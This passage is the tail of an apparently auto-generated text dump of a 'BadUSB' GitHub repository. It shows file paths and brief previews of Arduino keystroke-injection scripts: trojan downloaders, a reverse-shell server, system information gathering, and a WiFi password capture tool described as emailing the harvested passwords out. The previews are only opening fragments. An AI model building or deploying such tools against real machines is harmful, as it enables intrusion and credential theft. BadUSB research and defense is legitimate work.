"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
},
{
"path": "TrojanDownloader/PSL_DownLoader/PSL_Downloader_Win&Linux_General.ino",
"chars": 1333,
"preview": "void setup() {\n Keyboard.begin();\n delay(3000);\n Keyboard.press(KEY_LEFT_CTRL);\n Keyboard.press(KEY_LEFT_ALT);\n Key"
},
{
"path": "TrojanDownloader/PSL_DownLoader/PSL_Writes_Bounces.ino",
"chars": 3199,
"preview": "void setup() {\n // put your setup code here, to run once:\n //reverse_shell via cmd(local)\n delay(5000);\n Keyboard.pr"
},
{
"path": "TrojanDownloader/PY_DownLoader/PyShellServer.py",
"chars": 2465,
"preview": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n'''\nPyShell\nPyShell主要用于建立TCP连接,反弹Shell,远程执行命令\n其中Server端为攻击机(远程发送命令),Client"
},
{
"path": "TrojanDownloader/PY_DownLoader/Py_TrojanWrite(TargetEnvironmentRunPython).ino",
"chars": 11621,
"preview": "void setup() {\n Keyboard.begin();\n delay(10000);//延时\n Keyboard.press(KEY_LEFT_GUI);\n delay(200); \n Keyboard.print('"
},
{
"path": "Ubuntu_InformationGathering/BasicTerminalCommandsForUbuntu(Display).ino",
"chars": 849,
"preview": "//Ubuntu的基本终端命令\nvoid setup() {\n Keyboard.begin();\n delay(3000);//延时\n Keyboard.press(KEY_LEFT_ALT);\n delay(200); \n K"
},
{
"path": "Ubuntu_InformationGathering/UbuntuInformationCollectionTXT_File(Information).ino",
"chars": 4243,
"preview": "//信息收集\n//启用Ubuntu终端搜集操作系统信息\nvoid setup() {\n Keyboard.begin();\n delay(3000);\n Keyboard.press(KEY_LEFT_ALT);\n delay(20"
},
{
"path": "WiFi_ConnectionTrojan/ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino",
"chars": 3248,
"preview": "#define BOARDTYPE\n#ifdef TEENSY2\n #include<usb_private.h>\n#endif\n\n\n\nvoid setup(){\n \n delay(3000);\n wait_for_driver"
},
{
"path": "WiFi_PasswordAcquisition/WiFiPasswordCapture(tool).ino",
"chars": 2495,
"preview": "/ /无线密码捕获工具\n//说明:将SSID、网络类型、鉴权、密码保存到Log.txt中,将Log.txt的内容通过email发送到gmail账户。\nvoid setup() {\n Keyboard.begin();\n delay(30"
},
{
"path": "WiFi_PasswordAcquisition/WiFiPasswordExport(tool).ino",
"chars": 495,
"preview": "void setup() {//初始化\n Keyboard.begin();//开始键盘通讯 \n delay(5000);//延时\n Keyboard.press(KEY_LEFT_GUI);//win键 \n delay(500);"
}
]
// ... and 5 more files (download for full content)
About this extraction
This page contains the full source code of the wangwei39120157028/BadUSB GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 106 files (233.0 KB), approximately 101.8k tokens, and a symbol index with 9 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.